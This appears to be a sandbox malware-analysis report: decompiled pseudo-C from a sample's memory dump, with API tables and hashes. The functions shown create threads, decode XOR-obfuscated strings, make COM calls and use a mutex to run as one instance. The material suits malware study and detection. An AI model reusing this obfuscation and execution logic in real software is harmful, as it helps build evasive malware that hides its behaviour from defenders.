                • Instruction Fuzzy Hash: 6B213A30804109FBCF26AF64DE06B9CBB71FF55318F6001A8F691648A4CB724AA8EB41
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E010F8C89(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                				void* _v8;
                				long _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				void _v28;
                				void* _t31;
                				void* _t38;
                
                				_v12 = 0;
                				_v8 = 0;
                				_v28 = _a8;
                				_v24 = _a12;
                				_v20 = _a16;
                				_v16 = _a20;
                				_t31 = CreateThread(0, 0, E010F8C6E,  &_v28, 4, 0); // executed
                				_v8 = _t31;
                				if(_v8 == 0) {
                					L5:
                					return _v12;
                				} else {
                					if(_a4 == 0) {
                						L4:
                						ResumeThread(_v8); // executed
                						 *0x11013ac(_v8, 0xffffffff);
                						GetExitCodeThread(_v8,  &_v12); // executed
                						 *0x1101354(_v8);
                						goto L5;
                					} else {
                						_t38 = E010F8766(_a4, _v8); // executed
                						if(_t38 != 0) {
                							goto L4;
                						} else {
                							 *0x1101350(_v8, 0);
                							 *0x1101354(_v8);
                							return _v12;
                						}
                					}
                				}
                			}











                0x010f8c8f
                0x010f8c96
                0x010f8ca0
                0x010f8ca6
                0x010f8cac
                0x010f8cb2
                0x010f8cc6
                0x010f8ccc
                0x010f8cd3
                0x010f8d31
                0x010f8d37
                0x010f8cd5
                0x010f8cd9
                0x010f8d07
                0x010f8d0a
                0x010f8d15
                0x010f8d22
                0x010f8d2b
                0x00000000
                0x010f8cdb
                0x010f8ce1
                0x010f8ce8
                0x00000000
                0x010f8cea
                0x010f8cef
                0x010f8cf8
                0x010f8d04
                0x010f8d04
                0x010f8ce8
                0x010f8cd9

                APIs
                • CreateThread.KERNEL32(00000000,00000000,010F8C6E,00000000,00000004,00000000), ref: 010F8CC6
                • ResumeThread.KERNEL32(00000000), ref: 010F8D0A
                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 010F8D22
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Thread$CodeCreateExitResume
                • String ID:
                • API String ID: 4070214711-0
                • Opcode ID: 7724beeeb3814d5873a008634e18367bd7081aa63c54e82d68b56290f1b1dc8d
                • Instruction ID: 97bd58d42bc01062f126d973becf4e3c273584413742b03cb5984d5b103707cd
                • Opcode Fuzzy Hash: 7724beeeb3814d5873a008634e18367bd7081aa63c54e82d68b56290f1b1dc8d
                • Instruction Fuzzy Hash: 9021F47090420DFFDB15DF94C94ABEDBBB4EB04311F1081A9FA10AA6A0D7759A90EB90
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E010F8BC9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				void* _v8;
                				long _v12;
                				intOrPtr _v16;
                				void _v20;
                				void* _t25;
                				void* _t32;
                
                				_v20 = _a8;
                				_v16 = _a12;
                				_v12 = 0;
                				_v8 = 0;
                				_t25 = CreateThread(0, 0, E010F8BB4,  &_v20, 4, 0); // executed
                				_v8 = _t25;
                				if(_v8 == 0) {
                					L5:
                					return _v12;
                				} else {
                					if(_a4 == 0) {
                						L4:
                						ResumeThread(_v8); // executed
                						 *0x11013ac(_v8, 0xffffffff);
                						GetExitCodeThread(_v8,  &_v12); // executed
                						 *0x1101354(_v8);
                						goto L5;
                					} else {
                						_t32 = E010F8766(_a4, _v8); // executed
                						if(_t32 != 0) {
                							goto L4;
                						} else {
                							 *0x1101350(_v8, 0);
                							 *0x1101354(_v8);
                							return _v12;
                						}
                					}
                				}
                			}









                0x010f8bd2
                0x010f8bd8
                0x010f8bdb
                0x010f8be2
                0x010f8bfa
                0x010f8c00
                0x010f8c07
                0x010f8c65
                0x010f8c6b
                0x010f8c09
                0x010f8c0d
                0x010f8c3b
                0x010f8c3e
                0x010f8c49
                0x010f8c56
                0x010f8c5f
                0x00000000
                0x010f8c0f
                0x010f8c15
                0x010f8c1c
                0x00000000
                0x010f8c1e
                0x010f8c23
                0x010f8c2c
                0x010f8c38
                0x010f8c38
                0x010f8c1c
                0x010f8c0d

                APIs
                • CreateThread.KERNEL32(00000000,00000000,010F8BB4,?,00000004,00000000), ref: 010F8BFA
                • ResumeThread.KERNEL32(00000000), ref: 010F8C3E
                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 010F8C56
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Thread$CodeCreateExitResume
                • String ID:
                • API String ID: 4070214711-0
                • Opcode ID: f28057951207be8aa57d17a27f5c540cb5a77b1bb2ea7bc884ae2897448380f0
                • Instruction ID: 18970ef7adf2746c425c89baba39d54fd7cd54255c70c6f2c89268f65cede9ef
                • Opcode Fuzzy Hash: f28057951207be8aa57d17a27f5c540cb5a77b1bb2ea7bc884ae2897448380f0
                • Instruction Fuzzy Hash: C5110A3090420CFFDB15DF94CD0ABDDBBB4FB04311F1081A9FA20A6690D7759A54DB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E010F8856(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                				void* _v8;
                				long _v12;
                				intOrPtr _v16;
                				void _v20;
                				void* _t25;
                				void* _t32;
                
                				_v12 = 0;
                				_v8 = 0;
                				_v20 = _a8;
                				_v16 = _a12;
                				_t25 = CreateThread(0, 0, E010F8841,  &_v20, 4, 0); // executed
                				_v8 = _t25;
                				if(_v8 == 0) {
                					L5:
                					return _v12;
                				} else {
                					if(_a4 == 0) {
                						L4:
                						ResumeThread(_v8); // executed
                						 *0x11013ac(_v8, 0xffffffff);
                						GetExitCodeThread(_v8,  &_v12); // executed
                						 *0x1101354(_v8);
                						goto L5;
                					} else {
                						_t32 = E010F8766(_a4, _v8); // executed
                						if(_t32 != 0) {
                							goto L4;
                						} else {
                							 *0x1101350(_v8, 0);
                							 *0x1101354(_v8);
                							return _v12;
                						}
                					}
                				}
                			}









                0x010f885c
                0x010f8863
                0x010f886d
                0x010f8873
                0x010f8887
                0x010f888d
                0x010f8894
                0x010f88f2
                0x010f88f8
                0x010f8896
                0x010f889a
                0x010f88c8
                0x010f88cb
                0x010f88d6
                0x010f88e3
                0x010f88ec
                0x00000000
                0x010f889c
                0x010f88a2
                0x010f88a9
                0x00000000
                0x010f88ab
                0x010f88b0
                0x010f88b9
                0x010f88c5
                0x010f88c5
                0x010f88a9
                0x010f889a

                APIs
                • CreateThread.KERNEL32(00000000,00000000,Function_00008841,?,00000004,00000000), ref: 010F8887
                • ResumeThread.KERNEL32(00000000), ref: 010F88CB
                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 010F88E3
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Thread$CodeCreateExitResume
                • String ID:
                • API String ID: 4070214711-0
                • Opcode ID: 6c5cd11ea427ad7be502347f404e92ce8fa75c0967d06c502f3d0517dbb686fd
                • Instruction ID: d546da6094dfa42aaded43f52591f58b938401344289b41bd9fae31f87a5c1b0
                • Opcode Fuzzy Hash: 6c5cd11ea427ad7be502347f404e92ce8fa75c0967d06c502f3d0517dbb686fd
                • Instruction Fuzzy Hash: E4111931944208FFDF15DF94DD0ABEDBBB4FB04321F1041A9FA20A66A4D7758A94EB40
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 25%
                			E010F6D7E() {
                				char _v8;
                				void* _v12;
                				void* _v16;
                				void* _v20;
                				void* _v24;
                				void* _v28;
                				char _v32;
                				intOrPtr _v40;
                				char _v48;
                				intOrPtr _v56;
                				char _v64;
                				char _v80;
                				char _v96;
                				char _v112;
                				char _v128;
                				char _v152;
                				char _v160;
                				char _v168;
                				char _v220;
                				char _v284;
                				char _v332;
                				char _v460;
                				void* _t142;
                				signed int* _t143;
                				signed int* _t144;
                				signed int* _t145;
                				signed int* _t146;
                				signed int* _t147;
                				signed int* _t148;
                				signed int* _t149;
                				signed int* _t150;
                				signed int* _t151;
                				signed int* _t152;
                				void* _t156;
                				void* _t160;
                				void* _t166;
                				void* _t187;
                				void* _t199;
                				void* _t200;
                				void* _t201;
                				void* _t202;
                				void* _t203;
                				void* _t204;
                				void* _t205;
                				void* _t206;
                				void* _t207;
                				void* _t208;
                				void* _t231;
                
                				_v12 = 0;
                				_v20 = 0;
                				_v16 = 0;
                				_v24 = 0;
                				_t142 =  *0x1101500(0); // executed
                				if(_t142 == 0) {
                					_t143 =  &_v80;
                					 *_t143 = 0xe9830a21;
                					_t143[1] = 0x33d7cec5;
                					_t143[2] = 0xe206c440;
                					_t143[3] = 0xddfb87a2;
                					_t199 = 4;
                					do {
                						 *_t143 =  *_t143 ^ 0x22065fed;
                						_t143 =  &(_t143[1]);
                						_t199 = _t199 - 1;
                					} while (_t199 != 0);
                					_t144 =  &_v96;
                					 *_t144 = 0xfe14f96a;
                					_t144[1] = 0x33c92c92;
                					_t144[2] = 0x88061265;
                					_t144[3] = 0x62814ed;
                					_t200 = 4;
                					do {
                						 *_t144 =  *_t144 ^ 0x22065fed;
                						_t144 =  &(_t144[1]);
                						_t200 = _t200 - 1;
                					} while (_t200 != 0);
                					_t145 =  &_v112;
                					 *_t145 = 0x454d3975;
                					_t145[1] = 0x33d6b17f;
                					_t145[2] = 0xe2062e40;
                					_t145[3] = 0xddfb87a2;
                					_t201 = 4;
                					do {
                						 *_t145 =  *_t145 ^ 0x22065fed;
                						_t145 =  &(_t145[1]);
                						_t201 = _t201 - 1;
                					} while (_t201 != 0);
                					_t146 =  &_v128;
                					 *_t146 = 0x66aaf999;
                					_t146[1] = 0x33d6b711;
                					_t146[2] = 0xe206234d;
                					_t146[3] = 0x28ee9a2;
                					_t202 = 4;
                					do {
                						 *_t146 =  *_t146 ^ 0x22065fed;
                						_t146 =  &(_t146[1]);
                						_t202 = _t202 - 1;
                					} while (_t202 != 0);
                					_t147 =  &_v332;
                					 *_t147 = 0x22595fb2;
                					_t147[1] = 0x22745fbd;
                					_t147[2] = 0x22705f82;
                					_t147[3] = 0x22625f84;
                					_t147[4] = 0x22745f88;
                					_t147[5] = 0x22745fac;
                					_t147[6] = 0x226e5f8e;
                					_t147[7] = 0x22725f84;
                					_t147[8] = 0x22655f88;
                					_t147[9] = 0x22735f99;
                					_t147[0xa] = 0x22635f9f;
                					_t147[0xb] = 0x22065fed;
                					_t203 = 0xc;
                					do {
                						 *_t147 =  *_t147 ^ 0x22065fed;
                						_t147 =  &(_t147[1]);
                						_t203 = _t203 - 1;
                					} while (_t203 != 0);
                					_t148 =  &_v152;
                					 *_t148 = 0x22495fbf;
                					_t148[1] = 0x22525fa2;
                					_t148[2] = 0x22455fb1;
                					_t148[3] = 0x224b5fa4;
                					_t148[4] = 0x22345fbb;
                					_t148[5] = 0x22065fed;
                					_t204 = 6;
                					do {
                						 *_t148 =  *_t148 ^ 0x22065fed;
                						_t148 =  &(_t148[1]);
                						_t204 = _t204 - 1;
                					} while (_t204 != 0);
                					_t149 =  &_v168;
                					 *_t149 = 0x22425fa4;
                					_t149[1] = 0x22065fed;
                					_t205 = 2;
                					do {
                						 *_t149 =  *_t149 ^ 0x22065fed;
                						_t149 =  &(_t149[1]);
                						_t205 = _t205 - 1;
                					} while (_t205 != 0);
                					_t150 =  &_v284;
                					 *_t150 = 0x22435fbe;
                					_t150[1] = 0x22435fa1;
                					_t150[2] = 0x22525fae;
                					_t150[3] = 0x222c5fcd;
                					_t150[4] = 0x22405fcd;
                					_t150[5] = 0x22495fbf;
                					_t150[6] = 0x22265fa0;
                					_t150[7] = 0x226f5fba;
                					_t150[8] = 0x22355f83;
                					_t150[9] = 0x22595fdf;
                					_t150[0xa] = 0x226e5fbe;
                					_t150[0xb] = 0x22625f8c;
                					_t150[0xc] = 0x22715f82;
                					_t150[0xd] = 0x22695fae;
                					_t150[0xe] = 0x227f5f9d;
                					_t150[0xf] = 0x22065fed;
                					_t206 = 0x10;
                					do {
                						 *_t150 =  *_t150 ^ 0x22065fed;
                						_t150 =  &(_t150[1]);
                						_t206 = _t206 - 1;
                					} while (_t206 != 0);
                					_t151 =  &_v160;
                					 *_t151 = 0x22575fba;
                					_t151[1] = 0x22065fa1;
                					_t207 = 2;
                					do {
                						 *_t151 =  *_t151 ^ 0x22065fed;
                						_t151 =  &(_t151[1]);
                						_t207 = _t207 - 1;
                					} while (_t207 != 0);
                					_t152 =  &_v220;
                					 *_t152 = 0x226f5fba;
                					_t152[1] = 0x22355f83;
                					_t152[2] = 0x22595fdf;
                					_t152[3] = 0x226e5fbe;
                					_t152[4] = 0x22625f8c;
                					_t152[5] = 0x22715f82;
                					_t152[6] = 0x22695fae;
                					_t152[7] = 0x227f5f9d;
                					_t152[8] = 0x224f5fc3;
                					_t152[9] = 0x223b5fa9;
                					_t152[0xa] = 0x22235fca;
                					_t152[0xb] = 0x22215f9e;
                					_t152[0xc] = 0x22065fed;
                					_t208 = 0xd;
                					do {
                						 *_t152 =  *_t152 ^ 0x22065fed;
                						_t152 =  &(_t152[1]);
                						_t208 = _t208 - 1;
                					} while (_t208 != 0);
                					_t156 =  *0x1101510( &_v80, 0, 1,  &_v96,  &_v12); // executed
                					if(_t156 == 0) {
                						_t160 =  *0x1101510( &_v112, 0, 1,  &_v128,  &_v16); // executed
                						if(_t160 == 0) {
                							E010F6531(0xffffffff,  &_v8);
                							if(_v8 == 0) {
                								L29:
                								_push( &_v20);
                								_push(_v16);
                								_push(0);
                								_push(0);
                								_push(0);
                								_push(0);
                								_push(0);
                								_push( &_v152);
                								_push(_v12);
                								if( *((intOrPtr*)( *_v12 + 0xc))() == 0) {
                									_t166 =  *0x1101514(_v20, 0xa, 0, 0, 3, 3, 0, 0); // executed
                									if(_t166 == 0) {
                										_push( &_v24);
                										_push(0);
                										_push(0x30);
                										_push( &_v284);
                										_push( &_v160);
                										_push(_v20);
                										if( *((intOrPtr*)( *_v20 + 0x50))() == 0) {
                											while(1) {
                												_v28 = 0;
                												_v32 = 0;
                												_push( &_v32);
                												_push( &_v28);
                												_push(1);
                												_push(0xffffffff);
                												_push(_v24);
                												if( *((intOrPtr*)( *_v24 + 0x10))() != 0) {
                													break;
                												}
                												 *0x1101544( &_v48);
                												_push(0);
                												_push(0);
                												_push( &_v48);
                												_push(0);
                												_push( &_v168);
                												_push(_v28);
                												if( *((intOrPtr*)( *_v28 + 0x10))() == 0) {
                													 *0x11012f4( &_v460,  &_v220, _v40);
                													_t231 = _t231 + 0xc;
                													 *((intOrPtr*)( *_v20 + 0x40))(_v20,  &_v460, 0, 0, 0);
                													 *0x1101548( &_v48);
                												}
                												 *((intOrPtr*)( *_v28 + 8))(_v28);
                											}
                											L40:
                											if(_v24 != 0) {
                												 *((intOrPtr*)( *_v24 + 8))(_v24);
                											}
                											if(_v20 != 0) {
                												 *((intOrPtr*)( *_v20 + 8))(_v20);
                											}
                											if(_v16 != 0) {
                												 *((intOrPtr*)( *_v16 + 8))(_v16);
                											}
                											if(_v12 != 0) {
                												 *((intOrPtr*)( *_v12 + 8))(_v12);
                											}
                											_t187 =  *0x1101504(); // executed
                											return _t187;
                										}
                										goto L40;
                									}
                									goto L40;
                								}
                								goto L40;
                							}
                							 *0x1101544( &_v64);
                							_v64 = 3;
                							_v56 = 0x40;
                							_push( &_v64);
                							_push(0);
                							_push( &_v332);
                							_push(_v16);
                							if( *((intOrPtr*)( *_v16 + 0x20))() == 0) {
                								 *0x1101548( &_v64);
                								goto L29;
                							}
                							goto L40;
                						}
                						goto L40;
                					}
                					goto L40;
                				}
                				return _t142;
                			}



















































                0x010f6d87
                0x010f6d8e
                0x010f6d95
                0x010f6d9c
                0x010f6da5
                0x010f6dad
                0x010f6db3
                0x010f6db6
                0x010f6dbc
                0x010f6dc3
                0x010f6dca
                0x010f6dd1
                0x010f6dd6
                0x010f6dd6
                0x010f6ddc
                0x010f6ddf
                0x010f6ddf
                0x010f6de2
                0x010f6de5
                0x010f6deb
                0x010f6df2
                0x010f6df9
                0x010f6e00
                0x010f6e05
                0x010f6e05
                0x010f6e0b
                0x010f6e0e
                0x010f6e0e
                0x010f6e11
                0x010f6e14
                0x010f6e1a
                0x010f6e21
                0x010f6e28
                0x010f6e2f
                0x010f6e34
                0x010f6e34
                0x010f6e3a
                0x010f6e3d
                0x010f6e3d
                0x010f6e40
                0x010f6e43
                0x010f6e49
                0x010f6e50
                0x010f6e57
                0x010f6e5e
                0x010f6e63
                0x010f6e63
                0x010f6e69
                0x010f6e6c
                0x010f6e6c
                0x010f6e6f
                0x010f6e75
                0x010f6e7b
                0x010f6e82
                0x010f6e89
                0x010f6e90
                0x010f6e97
                0x010f6e9e
                0x010f6ea5
                0x010f6eac
                0x010f6eb3
                0x010f6eba
                0x010f6ec1
                0x010f6ec8
                0x010f6ecd
                0x010f6ecd
                0x010f6ed3
                0x010f6ed6
                0x010f6ed6
                0x010f6ed9
                0x010f6edf
                0x010f6ee5
                0x010f6eec
                0x010f6ef3
                0x010f6efa
                0x010f6f01
                0x010f6f08
                0x010f6f0d
                0x010f6f0d
                0x010f6f13
                0x010f6f16
                0x010f6f16
                0x010f6f19
                0x010f6f1f
                0x010f6f25
                0x010f6f2c
                0x010f6f31
                0x010f6f31
                0x010f6f37
                0x010f6f3a
                0x010f6f3a
                0x010f6f3d
                0x010f6f43
                0x010f6f49
                0x010f6f50
                0x010f6f57
                0x010f6f5e
                0x010f6f65
                0x010f6f6c
                0x010f6f73
                0x010f6f7a
                0x010f6f81
                0x010f6f88
                0x010f6f8f
                0x010f6f96
                0x010f6f9d
                0x010f6fa4
                0x010f6fab
                0x010f6fb2
                0x010f6fb7
                0x010f6fb7
                0x010f6fbd
                0x010f6fc0
                0x010f6fc0
                0x010f6fc3
                0x010f6fc9
                0x010f6fcf
                0x010f6fd6
                0x010f6fdb
                0x010f6fdb
                0x010f6fe1
                0x010f6fe4
                0x010f6fe4
                0x010f6fe7
                0x010f6fed
                0x010f6ff3
                0x010f6ffa
                0x010f7001
                0x010f7008
                0x010f700f
                0x010f7016
                0x010f701d
                0x010f7024
                0x010f702b
                0x010f7032
                0x010f7039
                0x010f7040
                0x010f7047
                0x010f704c
                0x010f704c
                0x010f7052
                0x010f7055
                0x010f7055
                0x010f7068
                0x010f7070
                0x010f7087
                0x010f708f
                0x010f709c
                0x010f70a5
                0x010f70ea
                0x010f70f2
                0x010f70f3
                0x010f70f6
                0x010f70f8
                0x010f70fa
                0x010f70fc
                0x010f70fe
                0x010f7106
                0x010f7107
                0x010f710f
                0x010f7127
                0x010f712f
                0x010f713e
                0x010f713f
                0x010f7141
                0x010f7149
                0x010f7150
                0x010f7151
                0x010f7159
                0x010f7160
                0x010f7160
                0x010f7167
                0x010f7176
                0x010f717a
                0x010f717b
                0x010f717d
                0x010f717f
                0x010f7187
                0x00000000
                0x00000000
                0x010f718f
                0x010f719a
                0x010f719c
                0x010f71a1
                0x010f71a2
                0x010f71aa
                0x010f71ab
                0x010f71b3
                0x010f71c6
                0x010f71cc
                0x010f71e4
                0x010f71eb
                0x010f71eb
                0x010f71f9
                0x010f71f9
                0x010f7201
                0x010f7205
                0x010f720f
                0x010f720f
                0x010f7216
                0x010f7220
                0x010f7220
                0x010f7227
                0x010f7231
                0x010f7231
                0x010f7238
                0x010f7242
                0x010f7242
                0x010f7245
                0x00000000
                0x010f7245
                0x00000000
                0x010f715b
                0x00000000
                0x010f7131
                0x00000000
                0x010f7111
                0x010f70ab
                0x010f70b1
                0x010f70b8
                0x010f70c7
                0x010f70c8
                0x010f70d0
                0x010f70d1
                0x010f70d9
                0x010f70e4
                0x00000000
                0x010f70e4
                0x00000000
                0x010f70db
                0x00000000
                0x010f7091
                0x00000000
                0x010f7072
                0x010f724e

                APIs
                • CoInitialize.OLE32(00000000), ref: 010F6DA5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Initialize
                • String ID: @
                • API String ID: 2538663250-2766056989
                • Opcode ID: e47cb933865218d4717590c7d7da146350f71ce92a5ab49aa77dc7c938699cf6
                • Instruction ID: 053df4c6cec19f9bea41f9dfd9d398ed525017916e266aa4a2f677f44102036d
                • Opcode Fuzzy Hash: e47cb933865218d4717590c7d7da146350f71ce92a5ab49aa77dc7c938699cf6
                • Instruction Fuzzy Hash: F1E105B19003099FDB59CF90CA89BADBBB9FB44300F1582D9E615AF2A1D770DA44CF91
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 53%
                			E010FE677(void* __edx, void* __esi) {
                				char _v8;
                				struct _SECURITY_ATTRIBUTES* _v12;
                				WCHAR* _v16;
                				void* _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				void* _v32;
                				intOrPtr _v36;
                				void* _t34;
                				void* _t37;
                				void* _t40;
                				void* _t54;
                				WCHAR* _t57;
                				void* _t59;
                				void* _t66;
                
                				_t66 = __edx;
                				if( *0x1100fb6 == 0) {
                					L4:
                					__eflags =  *0x1100fb7;
                					if( *0x1100fb7 != 0) {
                						_t54 = CreateThread(0, 0, E010FAEEE, 0, 0, 0); // executed
                						_v12 = _t54;
                						_v36 =  *0x11013f0();
                						_v24 = E010F61E7();
                					}
                					E010F69C4(); // executed
                					E010F6D7E(); // executed
                					__eflags =  *0x1100fb5;
                					if( *0x1100fb5 != 0) {
                						E010F724F(); // executed
                					}
                					__eflags =  *0x1100fb4;
                					if(__eflags != 0) {
                						E010F73C1(); // executed
                					}
                					E010F9554(__eflags);
                					 *0x1101310(0xffffffff80000001,  &_v8); // executed
                					_t34 = E010FB790(); // executed
                					_v32 = _t34;
                					__eflags = _v32;
                					if(_v32 != 0) {
                						__eflags =  *0x1100fb2;
                						if( *0x1100fb2 != 0) {
                							E010F8DC6(); // executed
                							E010FD009(); // executed
                						}
                						__eflags =  *0x1100fb3;
                						if( *0x1100fb3 != 0) {
                							E010FC8C1(); // executed
                						}
                						E010FB80E(_v32);
                					}
                					 *0x1101310(_v8,  &_v8);
                					__eflags =  *0x1100fb7;
                					if( *0x1100fb7 != 0) {
                						__eflags = _v12;
                						if(_v12 != 0) {
                							 *0x11013ac(_v12, 0xffffffff);
                							 *0x1101354(_v12);
                							_v12 = 0;
                						}
                						_t63 =  *0x11013f0() - _v36;
                						__eflags =  *0x11013f0() - _v36;
                						_v28 = E010F61E7();
                						E010FB06A(_t66, _v24, _v28, _t63); // executed
                					}
                					__eflags =  *0x1100fb6;
                					if( *0x1100fb6 != 0) {
                						__eflags = _v20;
                						if(_v20 != 0) {
                							 *0x11013e4(_v20);
                							 *0x1101354(_v20);
                						}
                					}
                					_t37 =  *0x11014a4(0x43);
                					__eflags = _t37;
                					if(_t37 != 0) {
                						E010FDD6F();
                						return E010FDB69(__eflags, 0);
                					} else {
                						_t40 = E010F7612(1); // executed
                						return _t40;
                					}
                				}
                				_t57 = E010F750F(); // executed
                				_v16 = _t57;
                				_v20 =  *0x11013dc(0x100000, 0, _v16);
                				if(_v20 == 0) {
                					_t59 = CreateMutexW(0, 1, _v16); // executed
                					_v20 = _t59;
                					E010F6022(_v16);
                					goto L4;
                				} else {
                					return  *0x1101354(_v20);
                				}
                			}


















                0x010fe677
                0x010fe685
                0x010fe6ce
                0x010fe6ce
                0x010fe6d5
                0x010fe6e6
                0x010fe6ec
                0x010fe6f5
                0x010fe6fd
                0x010fe6fd
                0x010fe700
                0x010fe705
                0x010fe70a
                0x010fe711
                0x010fe713
                0x010fe713
                0x010fe718
                0x010fe71f
                0x010fe721
                0x010fe721
                0x010fe726
                0x010fe73b
                0x010fe741
                0x010fe746
                0x010fe749
                0x010fe74d
                0x010fe74f
                0x010fe756
                0x010fe758
                0x010fe75d
                0x010fe75d
                0x010fe762
                0x010fe769
                0x010fe76b
                0x010fe76b
                0x010fe773
                0x010fe773
                0x010fe77f
                0x010fe785
                0x010fe78c
                0x010fe78e
                0x010fe792
                0x010fe799
                0x010fe7a2
                0x010fe7a8
                0x010fe7a8
                0x010fe7b7
                0x010fe7b7
                0x010fe7bf
                0x010fe7c9
                0x010fe7c9
                0x010fe7ce
                0x010fe7d5
                0x010fe7d7
                0x010fe7db
                0x010fe7e0
                0x010fe7e9
                0x010fe7e9
                0x010fe7db
                0x010fe7f1
                0x010fe7f7
                0x010fe7f9
                0x010fe804
                0x00000000
                0x010fe7fb
                0x010fe7fd
                0x00000000
                0x010fe7fd
                0x010fe7f9
                0x010fe687
                0x010fe68c
                0x010fe69f
                0x010fe6a6
                0x010fe6bd
                0x010fe6c3
                0x010fe6c9
                0x00000000
                0x010fe6a8
                0x010fe6b5
                0x010fe6b5

                APIs
                • CreateMutexW.KERNEL32(00000000,00000001,?), ref: 010FE6BD
                • CreateThread.KERNEL32(00000000,00000000,010FAEEE,00000000,00000000,00000000,00000000), ref: 010FE6E6
                Memory Dump Source
                • Source File: 00000000.00000002.359820599.00000000010F1000.00000020.00020000.sdmp, Offset: 010F0000, based on PE: true
                • Associated: 00000000.00000002.359816176.00000000010F0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359832611.00000000010FF000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.359837392.0000000001100000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.359842334.0000000001102000.00000008.00020000.sdmp Download File
                • Associated: 00000000.00000002.359846704.0000000001103000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_10f0000_GlLHM7paoZ.jbxd
                Similarity
                • API ID: Create$MutexThread
                • String ID:
                • API String ID: 2757498781-0
                • Opcode ID: 6b0269b4fa6324af9cc5a4ef13f02754d109c1365df456199b35ece1655442b9
                • Instruction ID: 65f0a7f0a5d673794305d9cc1b62b204ff3960f9610cba12a362c4025ff4d026
                • Opcode Fuzzy Hash: 6b0269b4fa6324af9cc5a4ef13f02754d109c1365df456199b35ece1655442b9
                • Instruction Fuzzy Hash: 03413F70D08346AFEB2AABA4DC0A7ED7FB1BB04755F04006DF7A0658E4C7B94584DB52
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E010FA134() {
                				int* _v8;
                				void* _v12;
                				int _v16;
                				int _v20;
                				short _v112;
                				char _v240;
                				signed int* _t48;
                				long _t51;
                				signed int* _t53;
                				long _t60;
                				void* _t65;
                				void* _t66;
                
                				_v8 = 0;
                				_t48 =  &_v112;
                				 *_t48 = 0x22495fbe;
                				_t48[1] = 0x22525fab;
                				_t48[2] = 0x22475fba;
                				_t48[3] = 0x22435fbf;
                				_t48[4] = 0x224b5fb1;
                				_t48[5] = 0x22655f84;
                				_t48[6] = 0x22695f9f;
                				_t48[7] = 0x22695f9e;
                				_t48[8] = 0x22725f8b;
                				_t48[9] = 0x22515fb1;
                				_t48[0xa] = 0x22685f84;
                				_t48[0xb] = 0x22695f89;
                				_t48[0xc] = 0x22755f9a;
                				_t48[0xd] = 0x22485fcd;
                				_t48[0xe] = 0x225a5fb9;
                				_t48[0xf] = 0x22735fae;
                				_t48[0x10] = 0x22745f9f;
                				_t48[0x11] = 0x22685f88;
                				_t48[0x12] = 0x22505f99;
                				_t48[0x13] = 0x22745f88;
                				_t48[0x14] = 0x226f5f9e;
                				_t48[0x15] = 0x22685f82;
                				_t48[0x16] = 0x22065fed;
                				_t65 = 0x17;
                				do {
